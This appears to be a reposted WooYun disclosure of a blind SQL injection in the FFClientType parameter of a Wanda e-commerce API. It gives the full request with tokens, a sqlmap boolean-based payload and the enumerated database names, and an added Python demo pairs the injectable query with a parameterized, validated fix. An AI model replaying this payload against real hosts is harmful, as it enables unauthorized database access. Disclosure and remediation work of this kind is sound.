神刀安全网

Vulnerability title: SQL injection in the e-commerce business of a Wanda e-commerce platform

Vulnerability details

Disclosure status:

2016-04-08: Details reported to the vendor; awaiting vendor handling
2016-04-11: Vendor has confirmed; details disclosed to the vendor only
2016-04-21: Details disclosed to core white hats and experts in related fields
2016-05-01: Details disclosed to regular white hats
2016-05-11: Details disclosed to intern white hats
2016-05-26: Details disclosed to the public

Brief description:

Dongfanghong DOTA Security Alliance (东方红DOTA安全联盟) - here's one

Detailed description:

GET http://api.ffan.com/ffan/v1/appskin/appSkins?FFClientType=1&FFClientVersion=32100000&FFUDID=15440&ddId=55&pLoginToken=bc5a89c493de&puid=7A3A3&size=750_1334&version=1&wdId=0f1cf59b3ff HTTP/1.1
Host: api.ffan.com
Accept: */*
Proxy-Connection: keep-alive

sqlmap resumed the following injection point(s) from stored session:
back-end DBMS: MySQL 5
sqlmap resumed the following injection point(s) from stored session:
Parameter: FFClientType (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: FFClientType=1 AND 6831=6831&FFClientVersion=32100000&FFUDID=15000000068222440&ddId=ded10ed85e3c8af56018ad2f9b2f557a304d6155&pLoginToken=bc5ad73a25a6fb59e3a26fe289c493de&puid=7C325CCEC0484391953762A94DABA3A3&size=750_1334&version=1&wdId=9a100c5a595de2696d7670f1cf59b3ff
    Vector: AND [INFERENCE]
back-end DBMS: MySQL >= 5.0.0


available databases [3]:
[*] ffan
[*] information_schema
[*] test
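The sqlmap output above says the defect is in how the integer query parameter FFClientType reaches the database: a true condition appended to it ("1 AND 6831=6831") returns the normal rows, a false one returns none, and that single bit per request is what boolean-based blind extraction is built on. The following is an added example, not code from the advisory or from the vendor, that reproduces that oracle against a constructed in-memory SQLite table and places it beside the hardened handler (allow-list the value as an integer, then bind it as a query parameter). The table name app_skins, its columns and rows are assumptions made for the demo; the real backend schema is unknown.

```python
# Added example (not from the original advisory): a boolean-based blind SQL
# injection oracle on an integer query parameter, reproduced against a
# constructed in-memory SQLite table, beside the parameterized and validated
# version. Table, column names and rows are assumptions for this demo.
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a constructed app_skins table standing in for the real backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE app_skins (id INTEGER, client_type INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO app_skins VALUES (?, ?, ?)",
        [(1, 1, "ios-default"), (2, 1, "ios-holiday"), (3, 2, "android-default")],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, ff_client_type: str) -> list[str]:
    """The defect: the raw query-string value is spliced into SQL unquoted.
    Anything after the number becomes part of the WHERE clause, so a
    true/false tail decides whether rows come back. That is the oracle sqlmap
    reported as 'AND boolean-based blind - WHERE or HAVING clause'."""
    sql = f"SELECT name FROM app_skins WHERE client_type = {ff_client_type} ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


# Allow-list: a short run of digits and nothing else.
_INT_RE = re.compile(r"[0-9]{1,9}")


def safe_lookup(conn: sqlite3.Connection, ff_client_type: str) -> list[str]:
    """Hardened version: validate the parameter as a small integer, then bind
    it as a query parameter so the driver never interprets it as SQL."""
    if not _INT_RE.fullmatch(ff_client_type):
        raise ValueError(f"FFClientType must be an integer, got {ff_client_type!r}")
    sql = "SELECT name FROM app_skins WHERE client_type = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (int(ff_client_type),))]


def rejects(conn: sqlite3.Connection, value: str) -> bool:
    """True if the hardened lookup refuses the value."""
    try:
        safe_lookup(conn, value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    # The two probes differ only in whether the appended condition is true.
    print(vulnerable_lookup(db, "1 AND 6831=6831"))  # same rows as plain "1"
    print(vulnerable_lookup(db, "1 AND 6831=6832"))  # no rows: one leaked bit
    print(safe_lookup(db, "1"))
    print(rejects(db, "1 AND 6831=6831"))
```

The validation step matters on its own: even with parameter binding, rejecting non-integer FFClientType values at the edge gives the WAF or application log a clean signal (a 400 on a parameter that should never contain spaces or operators) that is far easier to alert on than the two-row-versus-zero-row difference the blind oracle relies on.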

Proof of vulnerability:


Looks like the main database is ffan.

Running it was quite a grind~

Fix recommendation:

Movie tickets can fix this problem.

Copyright notice: please credit the source when reposting: zzR@WooYun (乌云)
